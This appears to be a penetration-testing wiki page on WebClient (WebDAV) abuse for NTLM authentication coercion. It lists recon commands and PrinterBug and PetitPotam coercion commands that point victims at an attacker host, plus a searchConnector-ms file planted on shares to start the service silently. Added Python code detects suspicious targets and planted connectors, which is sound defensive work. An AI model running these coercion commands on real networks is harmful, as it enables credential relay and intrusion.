WebClient abuse (WebDAV)

Theory

Web Distributed Authoring and Versioning (WebDAV) is an extension to the Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed over HTTP (docs.microsoft.com).
The WebClient service needs to be enabled for WebDAV-based programs and features to work. As it turns out, the WebClient service can be indirectly abused by attackers to coerce authentications. This technique is combined with other coercion techniques (e.g. PetitPotam, PrinterBug) and acts as a booster for them: it allows attackers to elicit authentications made over HTTP instead of SMB, which widens NTLM relay capabilities.

Practice

Recon

Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.
From UNIX-like systems, this can be achieved with webclientservicescanner (Python) or using CrackMapExec (Python).

webclientservicescanner 'domain.local'/'user':'password'@'machine'
crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav

From Windows systems, this can be achieved with GetWebDAVStatus (C, C#).

GetWebDAVStatus.exe 'machine'

Abuse

Regular coercion techniques rely on the attacker forcing a remote system to authenticate to another one. The "other" system is usually an IP address, a domain or NetBIOS name. With WebClient abuse, the other system needs to be supplied in the WebDAV connection string format.
The WebDAV connection string format is: \\SERVER@PORT\PATH\TO\DIR
To retrieve an authenticated connection, the remote server that the attacker wants the victim to authenticate to (the relay server) must be considered part of the intranet zone by the victim; otherwise the WebClient does not send credentials automatically. One way to achieve this is to use the NetBIOS or DNS name of the attacker machine instead of its IP address.
In order to have a valid NetBIOS name, Responder can be used.
A heftier alternative is to do some ADIDNS poisoning to create and use a valid DNS entry.
Below are a few examples of WebClient abuse with PrinterBug and PetitPotam.
# PrinterBug
dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER@PORT/randomfile.txt" "VICTIM_IP"
SpoolSample.exe "VICTIM_IP" "ATTACKER@PORT/randomfile.txt"

# PetitPotam
Petitpotam.py "ATTACKER@PORT/randomfile.txt" "VICTIM_IP"
Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER@PORT/randomfile.txt" "VICTIM_IP"
PetitPotam.exe "ATTACKER@PORT/randomfile.txt" "VICTIM_IP"
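The connection string format above is what a defender will see in coercion payloads, Responder/relay logs or proxy logs. The following is an added example (not a tool from this page or from the tools it names): a small parser for the \\SERVER@PORT\PATH and SERVER@PORT/PATH forms, plus a check that flags targets pointing at a dotless host the organisation does not own. The @SSL marker, the default port of 80 when none is given, and the "dotless name means intranet zone" rule are simplified assumptions about the Windows WebDAV redirector, and all sample strings and host names are constructed.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Forms accepted by this (added, illustrative) parser:
#   \\SERVER@PORT\PATH\TO\DIR        UNC form given in the text above
#   \\SERVER@SSL@PORT\PATH\TO\DIR    TLS form of the Windows WebDAV redirector (assumed)
#   \\SERVER\PATH\TO\DIR             port omitted; port 80 is assumed as the default
#   SERVER@PORT/PATH                 forward-slash form used in the coercion commands above
_CONNECTION_STRING = re.compile(
    r"^(?:\\\\)?"                         # optional leading \\
    r"(?P<host>[A-Za-z0-9._-]+)"          # NetBIOS name, DNS name or IP address
    r"(?P<ssl>@SSL)?"                     # optional @SSL marker
    r"(?:@(?P<port>\d{1,5}))?"            # optional @PORT
    r"(?P<path>[\\/].*)?$",               # remainder is the path, either separator
    re.IGNORECASE,
)


@dataclass
class WebDavTarget:
    host: str
    port: int
    tls: bool
    path: str
    dotless_host: bool  # simplified Windows rule: a name without dots is treated as Local Intranet


def parse_webdav_connection_string(value: str) -> Optional[WebDavTarget]:
    """Parse one WebDAV connection string; return None if it does not fit the forms above."""
    m = _CONNECTION_STRING.match(value.strip())
    if not m:
        return None
    tls = m.group("ssl") is not None
    port = int(m.group("port")) if m.group("port") else (443 if tls else 80)
    if not 0 < port < 65536:
        return None
    # Normalise the path to the UNC style the text uses, so both input forms compare equal.
    path = (m.group("path") or "\\").replace("/", "\\")
    host = m.group("host")
    # Zone heuristic (assumption, simplified): a dotless name lands in the Local Intranet zone by
    # default, where the WebClient sends NTLM credentials automatically; an IP address contains
    # dots and falls outside that default rule. This is why the text recommends a NetBIOS or
    # ADIDNS name for the relay host, and why such names are worth watching for.
    return WebDavTarget(host=host, port=port, tls=tls, path=path, dotless_host="." not in host)


def flag_suspicious_targets(candidates: Iterable[str],
                            allowed_hosts: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (string, reason) for WebDAV targets that point at a dotless host outside the
    allowlist (a NetBIOS/ADIDNS name the organisation does not own) or at a non-standard port."""
    allowed = {h.lower() for h in allowed_hosts}
    findings: List[Tuple[str, str]] = []
    for raw in candidates:
        target = parse_webdav_connection_string(raw)
        if target is None or target.host.lower() in allowed:
            continue
        if target.dotless_host:
            findings.append((raw, "dotless host outside the allowlist (intranet-zone name, automatic NTLM auth)"))
        elif target.port not in (80, 443):
            findings.append((raw, f"non-standard WebDAV port {target.port}"))
    return findings


# Constructed sample strings (not real hosts): two legitimate file servers, one unknown dotless
# name on an odd port, one IP-based string, and one line that is not a connection string at all.
SAMPLE_STRINGS = [
    r"\\FILESRV01@80\share\docs",
    r"\\files.corp.local@SSL@443\dav",
    r"\\WKS-UNKNOWN@8080\randomfile.txt",
    "10.0.0.5@80/randomfile.txt",
    "not a connection string",
]
KNOWN_WEBDAV_HOSTS = ["FILESRV01", "files.corp.local"]

if __name__ == "__main__":
    for raw, reason in flag_suspicious_targets(SAMPLE_STRINGS, KNOWN_WEBDAV_HOSTS):
        print(f"{raw}: {reason}")
```

Run against the constructed samples, only the unknown dotless host is reported; the IP-based string is not, which mirrors the text's point that an IP address does not yield an authenticated WebClient connection.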

Start the WebClient service

On a side note, making a remote system start the WebClient service can be done in several ways.
By mapping a remote WebDAV server. This can be done by having Responder's server up and by running the net use command.
# starting responder (in analyze mode to prevent poisoning)
responder --interface "eth0" --analyze
responder -I "eth0" -A

# map the drive from the target on which the WebClient service needs to be started
net use x: http://$RESPONDER_IP/
With a searchConnector-ms file uploaded to a widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently.
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://whatever/</url>
    </simpleLocation>
</searchConnectorDescription>
By opening an interactive session with the target (e.g. RDP), opening the Explorer, and typing something in the address bar.
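Because a planted searchConnector-ms file silently starts the WebClient service for every user who browses the share, it is worth scanning shares for such files. The following is an added example (not part of the original page or of any tool it names): a parser for the searchConnector-ms format shown above that extracts the simpleLocation URL and classifies the file against an allowlist of known internal hosts, plus a walker that applies it to share roots. The XML samples, the host sharepoint.corp.local and the allowlist are constructed.

```python
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Iterable, List, Tuple
from urllib.parse import urlparse

# Namespace used by the searchConnector-ms document shown in the text above.
SEARCH_CONNECTOR_NS = "http://schemas.microsoft.com/windows/2009/searchConnector"
_NS = {"sc": SEARCH_CONNECTOR_NS}


def inspect_search_connector(xml_text: str, allowed_hosts: Iterable[str]) -> Tuple[str, str]:
    """Classify one searchConnector-ms document and return (verdict, detail).

    Verdicts: 'unparseable', 'not-search-connector', 'no-url', 'non-http' (a scheme other than
    http/https), 'allowed' (http/https host on the allowlist) or 'suspicious' (host outside it).
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return "unparseable", str(exc)
    if root.tag != f"{{{SEARCH_CONNECTOR_NS}}}searchConnectorDescription":
        return "not-search-connector", root.tag
    url_el = root.find("sc:simpleLocation/sc:url", _NS)
    url = (url_el.text or "").strip() if url_el is not None else ""
    if not url:
        return "no-url", ""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ("http", "https"):
        return "non-http", url
    host = (parsed.hostname or "").lower()
    allowed = {h.lower() for h in allowed_hosts}
    return ("allowed" if host in allowed else "suspicious"), url


def scan_shares(roots: Iterable[Path], allowed_hosts: Iterable[str]) -> List[Tuple[Path, str, str]]:
    """Walk share roots and report every *.searchConnector-ms file with its verdict and URL."""
    results: List[Tuple[Path, str, str]] = []
    for root in roots:
        for path in Path(root).rglob("*.searchConnector-ms"):
            try:
                text = path.read_text(encoding="utf-8-sig")  # tolerate a UTF-8 BOM
            except (OSError, UnicodeDecodeError) as exc:
                results.append((path, "unreadable", str(exc)))
                continue
            verdict, detail = inspect_search_connector(text, allowed_hosts)
            results.append((path, verdict, detail))
    return results


# Constructed samples: the first reproduces the connector shown above (its URL host "whatever" is
# not an organisation host), the second is a benign connector pointing at a constructed internal host.
PAGE_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
  <description>Microsoft Outlook</description>
  <isSearchOnlyItem>false</isSearchOnlyItem>
  <includeInStartMenuScope>true</includeInStartMenuScope>
  <templateInfo>
    <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
  </templateInfo>
  <simpleLocation>
    <url>https://whatever/</url>
  </simpleLocation>
</searchConnectorDescription>
"""
BENIGN_SAMPLE = PAGE_SAMPLE.replace("https://whatever/", "https://sharepoint.corp.local/sites/docs")
ALLOWED_HOSTS = ["sharepoint.corp.local"]

if __name__ == "__main__":
    for name, sample in (("page sample", PAGE_SAMPLE), ("benign sample", BENIGN_SAMPLE)):
        print(name, inspect_search_connector(sample, ALLOWED_HOSTS))
```

In practice scan_shares would be run against the share roots users browse most (the ones the text describes as "widely used"), with the allowlist populated from the organisation's known SharePoint/OneDrive and WebDAV hosts; anything classified as suspicious points every browsing user's WebClient at a host the organisation does not control.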

Resources

Lateral Movement – WebClient (Penetration Testing Lab)
Connecting to WebDAV server on Microsoft Windows